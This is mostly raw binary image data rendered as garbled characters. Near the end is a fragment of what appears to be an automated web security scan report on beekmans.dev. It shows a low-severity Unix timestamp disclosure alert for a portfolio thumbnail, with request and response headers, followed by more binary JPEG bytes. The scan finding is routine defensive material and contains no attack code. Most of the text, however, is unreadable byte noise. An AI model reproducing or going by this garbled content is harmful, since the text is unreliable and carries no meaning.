¿xr¾Ûö½Që×¾ö‹þVéó¢/ú?ß¼9?ßmû^¨õëß{Eÿ+t¿ùÑýïÞŸï¶ý‡¯Tzõï½¢ÿ•º_üè‹þ÷ïO÷Û~Ãת=z÷ÞÑÊÝ/þtEÿGû÷‡'ûí¿aëÕ½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^½÷´_ò·KÿÑþýáÉþûoØzõG¯^ûÚ/ù[¥ÿΈ¿èÿ~ðäÿ}·ì=z£×¯}íü­ÒÿçD_ô¿xr¾Ûö½Që×¾ö‹þVéó¢/ú?ß¼9?ßmû^¨õëß{Eÿ+t¿ùÑýïÞŸï¶ý‡¯Tzõï½¢ÿ•º_üè‹þ÷ïO÷Û~Ãת=z÷ÞÑÊÝ/þtEÿGû÷‡'ûí¿aëÕ½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^½÷´_ò·KÿÑþýáÉþûoØzõG¯^ûÚ/ù[¥ÿΈ¿èÿ~ðäÿ}·ì=z£×¯}íü­ÒÿçD_ô¿xr¾Ûö½Që×¾ö‹þVéó¢/ú?ß¼9?ßmû^¨õëß{Eÿ+t¿ùÑýïÞŸï¶ý‡¯Tzõï½¢ÿ•º_üè‹þ÷ïO÷Û~Ãת=z÷ÞÑÊÝ/þtEÿGû÷‡'ûí¿aëÕ½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^½÷´_ò·KÿÑþýáÉþûoØzõG¯^ûÚ/ù[¥ÿΈ¿èÿ~ðäÿ}·ì=z£×¯}íü­ÒÿçD_ô¿xr¾Ûö½Që×¾ö‹þVéó¢/ú?ß¼9?ßmû^¨õëß{Eÿ+t¿ùÑýïÞŸï¶ý‡¯Tzõï½¢ÿ•º_üè‹þ÷ïO÷Û~Ãת=z÷ÞÑÊÝ/þtEÿGû÷‡'ûí¿aëÕ½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^½÷´_ò·KÿÑþýáÉþûoØzõG¯^ûÚ/ù[¥ÿΈ¿èÿ~ðäÿ}·ì=z£×¯}íü­ÒÿçD_ô¿xr¾Ûö½Që×¾ö‹þVéó¢/ú?ß¼9?ßmû^¨õëß{Eÿ+t¿ùÑýïÞŸï¶ý‡¯Tzõï½¢ÿ•º_üè‹þ÷ïO÷Û~Ãת=z÷ÞÑÊÝ/þtEÿGû÷‡'ûí¿aëÕ½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^½÷´_ò·KÿÑþýáÉþûoØzõG¯^ûÚ/ù[¥ÿΈ¿èÿ~ðäÿ}·ì=z£×¯}íü­ÒÿçD_ô¿xr¾Ûö½Që×¾ö‹þVéó¢/ú?ß¼9?ßmû^¨õëß{Eÿ+t¿ùÑýïÞŸï¶ý‡¯Tzõï½¢ÿ•º_üè‹þ÷ïO÷Û~Ãת=z÷ÞÑÊÝ/þtEÿGû÷‡'ûí¿aëÕ½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^½÷´_ò·KÿÑþýáÉþûoØzõG¯UüÁ¿—þÍù_€Ÿ}lyð»g¾ðíÌ»ÍOKŒß´q·Û®E!R©BPdX¦â)uA§Å%r>^ò´ëcz’I±HÙZb'‹§Ë͓ψîâ’æÝ&”'ø~Þµ&ÞOrl]˛ÙûÃ_·w>ÜÈÔbóx\œž·]LÅe†d7VR,ÈêZ9cetfFåM­Õ½í´7v“,–Ò(eaAÿVGpsÑI[I$¤úŸõ¿â=¹éÕ½:‡'×ý‡üWÝÕú‚ÿñ_zn®8ž¡Iùÿ_þ+¯¡Éùÿ_Ý:ºñêÿÄ{§§W^¡?Óý¿ºž®8 ¿ÓÝW}C“èßì?â=׫ŽC“óþ·º?ŸW:„ÿAþûú{§N¨/ôëû¯Vó꟟÷ߟt=9ü=B“óþ·üGº¯ü=C“ÝOŸVó꟟÷ߟmž#«ù³¨R}OúßñëéÕÇ¡?×ý÷õ÷Føz¸óêÿÅ}ÐùõqÄõ
          ٕµ)*Êڕ”ÊÀÜG ƒî§«>¶ÃþQ?Î!7W÷kâ¿Ë]Ò©º‡Ùàz‹¹sõJ‘îp)±»°²•777-3['u‚¥¾óDµp§<r7‚eÞ6HG&H”|>®ƒø|ÙGÃÄváQÏoAâ ûGùzÙ·ïh¿ån—ÿ:"ÿ£ýľŸï¶ý‡¤5½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^½÷´_ò·KÿÑþýáÉþûoØzõG¯^ûÚ/ù[¥ÿΈ¿èÿ~ðäÿ}·ì=z£×¯}íü­ÒÿçD_ô¿xr¾Ûö½Që×¾ö‹þVéó¢/ú?ß¼9?ßmû^¨õëß{Eÿ+t¿ùÑýïÞŸï¶ý‡¯Tzõï½¢ÿ•º_üè‹þ÷ïO÷Û~Ãת=z÷ÞÑÊÝ/þtEÿGû÷‡'ûí¿aëÕ½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^¸>OL….ÕÀ¤êqþG¯j_Q×âØ¯ùÙãÿó¶›þ¾{ßÓÏþøØÍ×µ/ñ½ü[ÿ;<þvÓ×Ï~úyÿßûùºö¥þ!׿‹b¿çgÿÎÚoúùïßO?ûáÿaÿ7^Ô¿Ä:
          û·#Ÿª÷”P×QÍ+ãéôÇTHÖÈÑ1҈協ÇãÙß-Ã2ï{{4LYâðž‘ߐlç¡øGU…îgè)×½û¯uï~ëÝ{ߺ÷_ÿÑÙ_ÞDtëÞý׺÷¿uî½ïÝ{¡W«ÿÏæ?å•ýSì›wø`ûOù:4Û>)¾Áþ^…ÿduï~ëÝ{ߺ÷P2¿ñkÉÔgþãÉíȵ‹ý0ÿMÍý”¿éOø:+^Æz÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^è¦üœø½‚ïL;eñ"—Ù8ªR˜ŒÓ/Ž›1Aš<&|ƌòR±$AQf’•Àd,Œ²o’írxrU¬˜å}?¤¿?Qçöç§¢”ÆsðõDÛ£mgv~w)¶·6.¯
          ÃÔ½&G[ŽzyBRXeƒÇ"ŽXÙ]•2|3EqsBá¢aPGú¿âº1R)%äúÿ°ÿŠûÙàzs¨/ÿ÷¦êã‰êŸŸõÿâ¾èzºñ꟟õýÓ«¯¡?üGºzuuêý?Ûû©êãêý=ÐõqçÔ9>þÃþ#Ýz¸áÔ9??ë{¡ãùõqèOôï¿§ºtààz‚ÿAþ¿ºõo>¡Éùÿ}ù÷CӟÃÔ)??ëÄ{¡êÿÃÔ9=Ôùõo>¡Éùÿ}ùöÙâ:¿˜û:…'Ôÿ­ÿ\qêýß_to‡«>¡?üWÝŸWOP¤üÿ®â}ÔõqçÔ)8¹oøu<GW^^ïò÷þb_~p}
          ßÙÂrÁŠëÞÉËÔßïÉÓ
          ÕÞÓµþü›GC‘¿ÓçË¢IC»ŽÝJÜ[®<Àÿÿ(è+»ìÔwf˜âÊ?¿å˜êò½‘ôëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^èlë/ø³×ÚÉ¿÷›Ùíý¼é?Êz9Û²“ý7ùBG²®Œz÷¿uî½ïÝ{¤Îñÿg-ÿ,#ÿ܈}«±ÿràûÉÒkÏ÷_³ü£¢ãìSÐ{¯{÷^ëÞý׺÷¿uî¿ÿÒÙ_ÞDtëÞý׺÷¿uî½ïÝ{¡W«ÿÏæ?å•ýSì›wø`ûOù:4Û>)¾Áþ^…ÿduï~ëÝ{ߺ÷P2¿ñkÉÔgþãÉíȵ‹ý0ÿMÍý”¿éOø:+^Æz÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺+_%þ2mÎúÀšºoµÂv&•Ó¸Ìeb«uH¸Lÿ‰ZœTÎOŽ@ZI¼a”ɇ›6õ6×.“V´cܾŸÒ_CüŸ‘E1Œú¯T)¼vŽã؛)µ7f*§žÃÎi«è*”FýQˈZšZ˜˜IѳG,l©ܝðÝB“Àá¢aPGú°}G—FŠÁ€e8éÿñ_n7N'¨R~×ÿŠû¡êëǨr~×÷N®¼z„ÿñééÕרOôÿoî§«Ž¨/ô÷CÕǟPäú7ûøuêã‡Päüÿ­î‡çÕÇ¡?оþžéӃêýúþëÕ¼ú‡'çý÷çÝNP¤üÿ­ÿÿPä÷SçÕ¼ú‡'çý÷çÛgˆêþcìêŸSþ·üGºúuqǨOõÿ}ý}Ѿ®<ú„ÿñ_t>}\q=B“óþ¹ÿ‰÷SÕǟP¤üÿ¾þžêxŽ®¼:†ÿñÛôêãêô¿—§ó	ü¡~@çB X1=yÙyz›¶˜hv¦ñ®¨ki¶˜èr27˜g?¦Od[†ßÆ{uûGùGùGA]çe®»Ë4ù²ð¯ùGæ:¾d]º÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^èlë/ø³×ÚÉ¿÷›Ùíý¼é?Êz9Û²“ý7ùBG²®Œz÷¿uî½ïÝ{¤Îñÿg-ÿ,#ÿ܈}«±ÿràûÉÒkÏ÷_³ü£¢ãìSÐ{¯{÷^ëÞý׺÷¿uî¿ÿÓÙ_ÞDtëÞý׺÷¿uî½ïÝ{¡W«ÿÏæ?å•ýSì›wø`ûOù:4Û>)¾Áþ^…ÿduï~ëÝ{ߺ÷P2¿ñkÉÔgþãÉíȵ‹ý0ÿMÍý”¿éOø:+^Æz÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî‹?ɍ[_¿¶í¤ðawÞ"šUÛ;¤DI^^Q‡ÌˆÁ’³	S3k4”ÎÆH¾²G)ÆÑ¼MµËе³åÿ(ô?áà|ˆzŒGú'T¾ö6èëÏ“ÙûÇQ‡Îâf1TÒÎ.’ÆMଣoe\~¸fŒ”‘
          Á÷'As
          Ü	qná¢aÇü‡Ð1Ñ´l®5)Áé'çýø¯·ON¯¡Éùÿ_Ý:ºñêÿÄ{§§W^¡?Óý¿ºž®8 ¿ÓÝW}C“èßì?â=׫ŽC“óþ·º?ŸW:„ÿAþûú{§N¨/ôëû¯Vó꟟÷ߟt=9ü=B“óþ·üGº¯ü=C“ÝOŸVó꟟÷ߟmž#«ù³¨R}OúßñëéÕÇ¡?×ý÷õ÷Føz¸óêÿÅ}ÐùõqÄõ
          OÏúçþ'ÝOW}B“óþûú{©â:ºðêÿÄ{oӫލ/ôï¿§½uqÀõy?ËÇù8N…ùžÿqŸä؎ºì¬´üã¹Zz©¼k¦oø·~˜è²2Ÿò~"¼Z$ˆŠþº¦sæ?Ê?ÍÐWyÙ5¼³Nî,£Ïæ>~£öu~ÿ^G ý²>ýwïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^èlë/ø³×ÚÉ¿÷›Ùíý¼é?Êz9Û²“ý7ùBG²®Œz÷¿uî½ïÝ{¤Îñÿg-ÿ,#ÿ܈}«±ÿràûÉÒkÏ÷_³ü£¢ãìSÐ{¯{÷^ëÞý׺÷¿uî¿ÿÔÙ_ÞDtëÞý׺÷¿uî½ïÝ{¡W«ÿÏæ?å•ýSì›wø`ûOù:4Û>)¾Áþ^…ÿduï~ëÝ{ߺ÷P2¿ñkÉÔgþãÉíȵ‹ý0ÿMÍý”¿éOø:+^Æz÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¢éò+ã–Òù¶
          @EˆÞ¨e;[vEzš	[SÿÈÓ%vªSû“xØù#*÷ÔkµnÓí“jNèâ__˜ô#×ò==ÍT|>c­|»¯7oVÌÞ¸©qY¼d¾¤k½-u$…þÛ'Œª
          #­ÆÖ"–ŽUúØ«ueY:ÚêÈâÝõFGì>`úéÑÌN²ÊqÐ{'çýnôêñêÿÄ{§§W^¡?Óý¿ºž®8 ¿ÓÝW}C“èßì?â=׫ŽC“óþ·º?ŸW:„ÿAþûú{§N¨/ôëû¯Vó꟟÷ߟt=9ü=B“óþ·üGº¯ü=C“ÝOŸVó꟟÷ߟmž#«ù³¨R}OúßñëéÕÇ¡?×ý÷õ÷Føz¸óêÿÅ}ÐùõqÄõ
          OÏúçþ'ÝOW}B“óþûú{©â:ºðêÿÄ{oӫލ/ôï¿§½uqÀõO¡ÿ_ÛgÏ«Ž]ïòîþc§n6¡>AgYöó56'¯;'-Qs·®
          -­»ë§k¶úc¢¯“CqÇí´=1-õ†­S@½Þc׿>/?·ˆWzØü@זIßŔyü×çê<ü³Ç`ðCÊAR‚ ‚8 d:ïߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷CgYŞ»þÖMÿ¸´ÞÈ7oíãÿIþSÑÎÛý”Ÿé¿È:=•tc×½û¯uï~ëÝ&wü{9oùaþäCí]û—ÛþN“^¸ÒýŸåbžƒÝ{ߺ÷^÷î½×½û¯uÿÕÙ_ÞDtëÞý׺÷¿uî½ïÝ{¡W«ÿÏæ?å•ýSì›wø`ûOù:4Û>)¾Áþ^…ÿduï~ëÝ{ߺ÷P2¿ñkÉÔgþãÉíȵ‹ý0ÿMÍý”¿éOø:+^Æz÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^è•üÑÄ|{ÎlÜv7¹weÉÜSšÃ°÷$8¼¦k;¬êIÅà¨rÍ»3*%ZH‰bº]&ñ°?ØsŽw{L‘
          kZ€ûI7§ŸÊ•éU©˜91-W̫ϪÉSÃI[[KO]M“§§©š2TI[%|QHÉe,yJ„pT(‚x!”)‘ZàI
          K*’¤äiQòÁ#öÑÒùc¦‡ÿˆ÷_N®½B§ûu=\p=A§º®<ú‡'Ñ¿ØÄ{¯W:‡'çýot<>®8u	þƒý÷ô÷NœP_è?×÷^­çÔ9??ï¿>èzsøz…'çýoøt=_øz‡'ºŸ>­çÔ9??ï¿>Û<GWógP¤úŸõ¿â=×Ó«Ž=B¯ûïëîðõqçÔ'ÿŠû¡óêã‰êŸŸõÏüOºž®<ú…'çý÷ô÷SÄuuáÔ7ÿˆöß§WP_è?ßOzêãêŸCþ¿¶ÏŸW:…/çý‡üGºõqÀu³wòÊÝ_.évÙÚ½ÃÖü—Mä0ß{Ö£•ÜRŸ;ÄDö8LÞÛÉn(7–CjÖCþR´/4´j¢J'ŠJ`öà¶ÅÙ¢xµÈ¡ÏçJW×üü@{ô{ašI-nº½4'Ô4×ÔWùÖ¶Ùì· ß^÷î½×½û¯uï~ëÝ{ߺ÷CgYŞ»þÖMÿ¸´ÞÈ7oíãÿIþSÑÎÛý”Ÿé¿È:=•tc×½û¯uï~ëÝ&wü{9oùaþäCí]û—ÛþN“^¸ÒýŸåbžƒÝ{ߺ÷^÷î½×½û¯uÿÙ
          Evidence
          195689250
          Solution

          Manually confirm that the timestamp data is not sensitive, and that the data cannot be aggregated to disclose exploitable patterns.

        42. GET https://beekmans.dev/img/portfolio/minor/blue/39-thumbnail.jpg
          Alert tags
          Alert description

          A timestamp was disclosed by the application/web server - Unix

          Other info

          196294602, which evaluates to: 1976-03-21 23:16:42

          Request
          Request line and header section (266 bytes)
          GET https://beekmans.dev/img/portfolio/minor/blue/39-thumbnail.jpg HTTP/1.1
          Host: beekmans.dev
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: https://beekmans.dev/
          
          
          Request body (0 bytes)
          Response
          Status line and header section (1162 bytes)
          HTTP/1.1 200 OK
          Date: Mon, 06 Dec 2021 09:56:07 GMT
          Content-Type: image/jpeg
          Content-Length: 206479
          Connection: keep-alive
          last-modified: Tue, 02 Nov 2021 10:18:04 GMT
          etag: "3268f-5cfcb9bec2340"
          content-security-policy: default-src 'self' http: https: data: blob: 'unsafe-inline'
          x-frame-options: SAMEORIGIN
          x-xss-protection: 1; mode=block
          x-content-type-options: nosniff
          referrer-policy: no-referrer-when-downgrade
          strict-transport-security: max-age=31536000; includeSubDomains; preload
          Cache-Control: max-age=14400
          CF-Cache-Status: HIT
          Age: 2419
          Accept-Ranges: bytes
          Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=SYXxHO2kzCBxL9qJ96pBwK%2Fu7dVLWBMYkUBmyhg22h%2FJCxoI7u0Yf9ccFyIITYmPwk%2BYbhFBi8dkM8jrfr7jbM2TCDCUS4Fm46vKeCPMJFbFffN2RsHn4GLPwNUiVLI%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 6b94a47d1d0f4c43-AMS
          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
          
          
          Response body (206479 bytes)
          ÿØÿáæExifMM*bj(1!r2“‡i¨Ô
          ü€'
          ü€'Adobe Photoshop 21.0 (Macintosh)2019:12:03 13:35:22  ° v"*(2¬HHÿØÿíAdobe_CMÿîAdobed€ÿۄ			
          
          
          
          ÿÀT "ÿÝ
          ÿÄ?	
          	
          3!1AQa"q2‘¡±B#$RÁb34r‚ÑC%’Sðáñcs5¢²ƒ&D“TdE£t6ÒUâeò³„ÃÓuãóF'”¤…´•ÄÔäô¥µÅÕåõVfv†–¦¶ÆÖæö7GWgw‡—§·Ç×ç÷5!1AQaq"2‘¡±B#ÁRÑð3$bár‚’CScs4ñ%¢²ƒ&5ÂÒD“T£dEU6teâò³„ÃÓuãóF”¤…´•ÄÔäô¥µÅÕåõVfv†–¦¶ÆÖæö'7GWgw‡—§·ÇÿÚ?ì’I%iI$’JrúŸ«n}8Âëi¯Ðu¤T털?gº?’šž•‘yp«/$í‚fèç⥛ÿ,Sÿ…_ÿŸÏÕвtÃ"ë‰ò—,tµ 9°sî^GþÄ%û7þåäìBëX^kcŸK[a½€‚{´>¿üÕ0ZI`ZÞ%Ø.áxÿØ9¿÷/#ÿbýƒ›ÿrò?ö!uö0°L×5Ó‰§Ç䏿.ÁTGöoýËÈÿ؄¿`æÿܼýˆ]U
          º–Ü(umx¶´±ãX÷±Íö©úŒýÆÿ¯ÉžDXF4H:£É~ÁÍÿ¹yû—ìßû—‘ÿ±­W݀| ¤û+{«¬>À	c
          Æ=­Ý®ÝÈûòì¡y'ô,Úë6»+#cD’/¨ö]‹f=µåd<›ë¬¶ËšZ÷mxsWaœp^ç1µ8Ña¶½aöïÌzä³~Ž7þ£þ©IŠfbÊ$+GdòRNy?É«T’I$§ÿÐì’I%iI!Úm5F°‰EF”åæÿË4áGÿçÅ·õséäü+ÿы7þZ£ÿ
          ?ÿ>-¿«ŸO'á_þŒK'óGËþét]+…€ã½Ûš,ö€ÂG¨æí­ÞýŸAX-
          lëÒ~à?+”ÏÑUNëïJ¤9ùx¸8wçe¸2ŒjÝe"a­ŒÎwòW5‹ÒúÏÖJۛÖrïé˜Wø½#â—úF6ÙÔ2X=k-µ§ßŽÏM”Æo­\úðÖ¿¢×]ÀK3pٙ<z'"ŸSwò~Š?ւöt÷ÙìnÐ,’-ÎÖÔG溯ç=ßÍïHςC}æ¯ÃÝÉw\DFüܱõB†ÐÜÏ«_+
          çɤ›Ý‘c„ûo£ Ûê}Å«¿W:æOR¯#¨TÜ^¯Ó^)ÏÇÛ.©É ïÕòYï¯ÿ8U>©>ÛZßMþ™ihy2ƺ}cŽÝvîý«ÿ[S›ÆE» 5ݮɎÆFÚ7ÿÂzôÐä2Þ®ü—óx§6çºØ™nélîm‘ê}ý-ŸAŽhåÄ ýõ8Ø9ºx€¤+Q·üЎŒ:‰âFßú’¸Üÿ†èÿª]P…pÿ·ËóJã³þŽ/þ£þ©OËì|֗mßHüS'wÒ?È­RI$’ŸÿÑì“=í­…ï0Öò,‹t˜…Óà[î
          Øci}LÛ{†³ ’´+œõ|ÿ¯úÿ)ktÜÇd×aÜúÀ!ÝËNžïå5>CKì’×Îÿ–èÿÂoÿÏ«sêçÓÉøWÿ£wü»Gþþ}sêçÓÉøWÿ£26—é&.Ó€÷s÷ÿ§:Èø F€m:y»ÿ ›ª=KßÒÛüå§W¸çV׿k]ú/Sm¸ª¼U>Ku>‹Õz~GNËnì|¦ì$ùìß¤c½õÿ-sÔõûº[‰õ²—Î;MUuºêu´_Y®¿Òm¶ádÙ·õŠmýì¯Õõ=%ÓÛ[žA¢ƒk¸
          Ói3ü©nÔAGPz<áúéõyímÝ_1¦hÆÄ¥Ík\á·}™6VÌ|Zýߥ¹f}Të732η–1¾±u,“^]V±Ím~—è±1i¾¦ÐÖ;ôvYoé¿áoéXAÀxÂóß®¿UZδί•i+>Æ3¨>dÒí­¡ŽÜáíÆÈÙU~£¿£?þù¹!íэUïKOÑQâ‘lø¾‰é¿÷ÿ脃,ã~ŸÌcfæt½˜¶d9øºWuÐç4ðÜ\› 9Û¿í6K¿þbïÓú_iÔ¯ªÚàXâÚ÷ˆmÀn
          ${^æîc®«{Ñïå£?Ýro¡ï®ÍÎ¥ýïø›?ê
          ã:‡ÑÅÿÃxÿõK±ÍméÏm¯XÚð6‡83Üýží›¿uqÝGèâÿáÌúµs—ùK^[÷wôÅ2w}#ñLŠÅ$’I)ÿÒì–?_Ê{V00ÂßQÿÊ2ZÉþ¦Õ°‘õ_©2‹ï¶æXþ´w¾=ÌÑVøã–ñ>´ຜ,JñhkY«Þ¬yåÆ?ê>Äcõ¤G¯“¯òÙÿ¤U̼
          °é«ÓsœWï‚`7Ghû‰±•Jˆ/)×óNUǹ¬Šæm'o62¿uë~n)qÇ¥µ—Àw¾f>Ó­ß¼¶:—FÄêO®ËÝeo¨‡VF­'v×5íç*óG§§ÈûëÿÒiÀƨ¨?óó«þë~öÿé¿ççWýÖýíÿÒ(ßóG§§ÈûëÿÒi͝þŸ#ï¯ÿI¡Xÿt}е±~ºu¬¬š±«ô˜ûœ×Úö±€Ÿß£þ¿AhUÕþ´Ú^öx©‚Ë
          Žu[k/¾ƒmŒ¿»+mc¹ïÞÏ ³ßõo«2èȼ]]–׸Tæîc὏©Ì{W+gÖ.³‘éÙ~Kí,pµ¡çsCçÔÝé;ôOÚÿ¡]Œô«ÿè#ö.ˆ'gµ¯ë[¶·ß^Nñ«©¹½{š*{-½¯sY„ë[¶¬w¹õ½›þ‚¥Ô¾²uæ?¦õ*j»Óp¦á2Ͷ†oöºš··Ò·ü+5oÖ~¹uÇ·$¾‹ÚúËZmÍµžÖlÛcö3üøMkôLýa§'¨uí9>¿¦ç3`Üuß¹Ž÷~gµ¯%Þ¨z»:Xo¯ãÑ/ý>€×ŠçûFßQÝ7%ßKs)ý&þsôÎÓúM:)ôim;Ý`d€çêâ&FãùÛygãýZÅÆvê2²Ii#ôdÓ½š:¯Írӓ0t?ø*ÆBñ¼¿­ûÒýÞ&ÿ-ž9	,ºGú¿Õýî—Zë]S†vƒÒtINÇ;eŒüýËõ‡æß‹A¥µ´ÐýÁÅßEãH-oï.žú*È¢Ê.nêíik‡‘ÿ¿5gc}Wéô]MæËžêËmkæAƒì±ÁŒký?Q¿ÛVyLàÀé(ÿ΋[›ÃÁ.1òÈÿ‹'eßHüS$’™¨¤’I%?ÿÓìÚǼ–±¥ç˜h’¶±­
